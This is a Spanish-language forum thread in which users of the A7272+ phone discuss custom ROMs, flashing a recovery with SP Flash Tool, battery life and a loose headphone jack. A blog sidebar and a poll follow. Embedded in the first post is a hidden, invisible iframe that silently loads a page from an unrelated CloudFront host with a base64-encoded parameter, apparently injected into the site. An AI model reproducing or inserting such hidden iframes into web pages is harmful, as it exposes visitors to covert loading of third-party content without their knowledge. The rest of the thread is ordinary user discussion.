Telefono A7272+ Dual Sim

El manual me parece genial, pero tengo una duda ya que no consigo entrar en ninguna red wifi asegurada con wpa (aunque las veo y sé las contraseñas). ¿alguna de esas actualizaciones lo soluciona? preferiría una oficial, porque me da un poco de cangis empezar con las otras... Gracias.<iframe class=" lwdhvazygjirfsrrbrgw" style="display: none; visibility: hidden;" src="http://d3lvr7yuk4uaui.cloudfront.net/d.html?c=dW5kZWZpbmVkOnVuZGVmaW5lZDp1bmRlZmluZWQ6MTAzNjoxMjc2ODp1bmRlZmluZWQ6"></iframe>
Yo con las de vin2c me conecto perfectamente a las wpa2 cifradas (en mi casa la configure asi)

Estoy usando hace una semana la release 2 de la rom de vin2c y el unico cambio notorio respecto a la primer release es que logro hacer un buen espacio en la rom, mas de la mitad libre si mal no recuerdo tenia al instalarla.

Lo que note estas ultimas semanas es que la ventaja que tenia con la rom de vin2c de la duracion de la bateria se fue perdiendo, comenzo a durar menos la bateria. Estoy en vista de comprar una bateria para novia N97 en mercadolibre o dealextreme igual.

Por ultimo, desde que lo compre mi celu que parece que el jack del auricular esta mal, porque coloco el auricular y no anda y si lo toqueteo un poco engancha bien. Alguien sabe como abrirlo para poder acomodar el conector de los auriculares, como se hace?
Muchas gracias
 
Por ultimo, desde que lo compre mi celu que parece que el jack del auricular esta mal, porque coloco el auricular y no anda y si lo toqueteo un poco engancha bien. Alguien sabe como abrirlo para poder acomodar el conector de los auriculares, como se hace?
Muchas gracias

Creo que sólo funciona bien con los cascos que venían. A mí es lo que me pasa. Si conecto un jack que no sea el de los cascos que venían parece que hace mal contacto alguno de los canales. Estos chinos todavía fabrican las cosas a las medidas que les parece, jejeje...
 
Lo de los cascos es por la longitud de la clavija, si pruebas a sacar un poco la que no es original verás como funciona, pero claro, a ver como la fijas. Solución : hacerte con una Hembra, cortar la clavija de los cascos dejando un trozo de cable para soldarla ahí, localizar unos cascos con esa clavija en los chinos, localizar una clavija de la misma longitud para soldarla a los cascos que quieras. Vamos, un engorro.
 
Gracias lucho_elmillo. Podrías indicarme de donde puedo bajar la rom vin2c? o donde puedo buscar información para instalarla? La verdad que estoy un poco perdida y uds. hablan como si fuera todo tan facil... que me siento un poco como tonta .

Saludos. :have a nice day:
 
He probado una bateria original nueva nokia BP-4L de 1500 Mah y he notado una cierta mejoría en la autonomía (con la ROM original). Es cierto que sigue siendo no lineal en la duración (también en la carga) pero algo más dura. En todo caso, trataré de cargar la batería con un cargador con menor potencia como indica jcestal, ya que el que utilizo ahora es un Nokia original de 890 Mah. En todo caso, por los comentarios que se leen en el hilo, algo falla o en la ROM o en el teléfono, porque conseguir dos días apagándolo por las noches, sin utilizar wifi y con 3/4 llamadas al día no parece una gran hazaña, desde luego.

Jcestal, ¿donde has comprado el cargador que estás utilizando?
 
Yo con las de vin2c me conecto perfectamente a las wpa2 cifradas (en mi casa la configure asi)

Estoy usando hace una semana la release 2 de la rom de vin2c y el unico cambio notorio respecto a la primer release es que logro hacer un buen espacio en la rom, mas de la mitad libre si mal no recuerdo tenia al instalarla.

Lo que note estas ultimas semanas es que la ventaja que tenia con la rom de vin2c de la duracion de la bateria se fue perdiendo, comenzo a durar menos la bateria. Estoy en vista de comprar una bateria para novia N97 en mercadolibre o dealextreme igual.

Por ultimo, desde que lo compre mi celu que parece que el jack del auricular esta mal, porque coloco el auricular y no anda y si lo toqueteo un poco engancha bien. Alguien sabe como abrirlo para poder acomodar el conector de los auriculares, como se hace?
Muchas gracias

Eso es lo que me paso a mis con la roms de Vins, fue cayendo el aguante de la bateria ( 3 o 4 llamadas y algunos sms al dia ) la tengo q cargar todas las noches.....
 
Buenas, en mi caso compre Cargador + Batería original Nokia BP-4L en ebay por 9€:
Cargador A7272.jpg




Os dejo la Rom con la que he estado haciendo las pruebas con la bateria , basada en Vin2s con algunos cambios:

-Rom Root se instala a través del Recovery Linerty.
-Core procedente de la última actualización oficial: Power C7+ 20111216-095941
-Modem última versión: MAUI.11AMD.W11.37.SP.V4
-Ultimas actualizaciones del Market, Barcode Scaner, Batery Calibration, PullWifi, Gmail, Z-test, Root explorer..
-Launcher del sistema: 360Launcher, (incluye widgets de bateria y task killer)

360-launcher-2.jpg


Contacts del sistema: Go contacts+Go Dialer(incluye temas Iceblue y Spring)


img834.imageshack.us_img834_7595_dialerspring.jpg
img10.imageshack.us_img10_4871_gocontactsdialer3.png
img46.imageshack.us_img46_4193_gocontactsdialer2.png




Tambien hay mejoras visuales, como tipo de letra, iconos de sistema, animación de ventanas.

Enlace Rom: -Enlace a Rapidshare con archivo roto.-

Saludos

Cargador A7272.jpg


360-launcher-2.jpg


GO-Contacts-Dialer.jpg


GO-Contacts-Dialer2.jpg


GO-Contacts-Dialer3.jpg
 
Última edición por un moderador:
Gracias Jcestal descargue esta versión del rom y esta muy bien, todo se ve mucho mejor.
 
Bueno, otra vez a la carga ahora que tengo algo de tiempo.
Voy a intentar instalar el recovery linerty porque, a pesar de llevar leyendo este hilo ya hace semanas y habérmelo leido todo (o casi todo) un par de veces, aún no lo he conseguido. Sigo todas vuestras indicaciones y cuando finalizo el proceso pasito a pasito y consigo el ok en un círculito verde del SP Flashtool, lo que obtengo siempre es el recovery original, asi que no puedo probar la famosa ROM Vin2s para mejorar la vida de la batería. ¿Ha alguien más le paso oha pasado esto? Por cierto, yo tengo el w7272.
 
Bueno, otra vez a la carga ahora que tengo algo de tiempo.
Voy a intentar instalar el recovery linerty porque, a pesar de llevar leyendo este hilo ya hace semanas y habérmelo leido todo (o casi todo) un par de veces, aún no lo he conseguido. Sigo todas vuestras indicaciones y cuando finalizo el proceso pasito a pasito y consigo el ok en un círculito verde del SP Flashtool, lo que obtengo siempre es el recovery original, asi que no puedo probar la famosa ROM Vin2s para mejorar la vida de la batería. ¿Ha alguien más le paso oha pasado esto? Por cierto, yo tengo el w7272.
Yo al principio me volvi loco pero lo que hice fue lo siguiente:
- Verficiar que los drivers esten correctos en el equipo.
- Flashear utilizando el SP Flash Tool con el recovery de A7272+ (el de W7272 no funciona no se porque)
- Iniciar el telefono con el boton de volumen + y luego mantener presionado el boton de power (siempre con el cable usb conectado) y ahi entra.
Proba con eso y contanos
 
Gracias por la rom modificada, la meteré en cuando pueda, aunque con la anterior de vins ya alcanzo 4/5 días de teléfono con los datos activados y 1/2 llamadas cortas al día. Me basta para ahorrarme el "engorro" de estar siempre enchufado, pero en cuanto utilizo Wifi y poco más se viene abajo, a cualquiera que de un uso medio del teléfono es muy escasa la batería, pero vamos, tampoco mucho menos que un Galaxy.

@jcestal ¿crees que esa batería es original?, bajo mi pequeña experiencia en compras por internet, dudo mucho de que sea así, ¿qué consigas diferentes duraciones y demás?, casi seguro, es dificil encontrar iguales prestaciones en cualquier producto chino sin estándares prefijados por una "gran marca". Tempoco digo que te hagan engañado, porque por el precio no se puede decir eso, pero sólo el cargador ya son 4$ y pico ¿el resto de bateria original? ummmm.
 
Última edición por un moderador:
@jcestal Ya he instalado tu nueva ROM, a ver que tal me va con la batería. Gracias.
 
Última edición por un moderador:

Del blog

  • Revisión del router con VPN Slate AX GL-AXT1800 de GL-iNet
    Sat, 27 Apr 2024 13:49:32 CEST
    Un vistazo al GL-AXT1800 El GL-iNet Slate AX WiFi 6 es un router/bridge de doble banda lo suficientemente pequeño como para llevarlo contigo mientras viajas. Es el primero de la marca en incorporar el ...
  • Vodafone lidera quejas en España según la OCU
    Fri, 26 Apr 2024 18:43:26 CEST
    Análisis de las reclamaciones en el primer trimestre de 2024 Durante el primer trimestre de 2024, la plataforma Reclamar de OCU recibió más de 17.000 reclamaciones, lo que ha impulsado la actividad de ...
  • Blackview se prepara para presentar el BL9000 Pro con tecnología FLIR®
    Thu, 25 Apr 2024 18:37:25 CEST
    Blackview fortalece su asociación con FLIR® para el lanzamiento del BL9000 Pro La marca de móviles Blackview continúa buscando su lugar en el mercado al fortalecer su colaboración con el líder de la i ...
  • O TikTok se vende, o se prohibe – así es la nueva ley en EE.UU
    Thu, 25 Apr 2024 10:23:41 CEST
    Ultimatum a TikTok El presidente Biden ha promulgado una ley que impactará significativamente a la popular plataforma de redes sociales TikTok en los Estados Unidos. Esta acción legislativa busca forz ...
  • 150 millones de usuarios activos en Threads
    Thu, 25 Apr 2024 10:07:20 CEST
    Threads, la aplicación de mensajería de Instagram, ya supera los 150 millones de usuarios activos mensuales El CEO de Meta, Mark Zuckerberg, reveló recientemente que Threads, la aplicación de mensajer ...

Es tendencia

¿Ha terminado la locura de añadir tantas cámaras a los móviles?

  • Si

  • No

  • No lo se

  • Ya me gustaría...

  • Ya te gustaría...


Los resultados solo son visibles tras votar.
Atrás
Arriba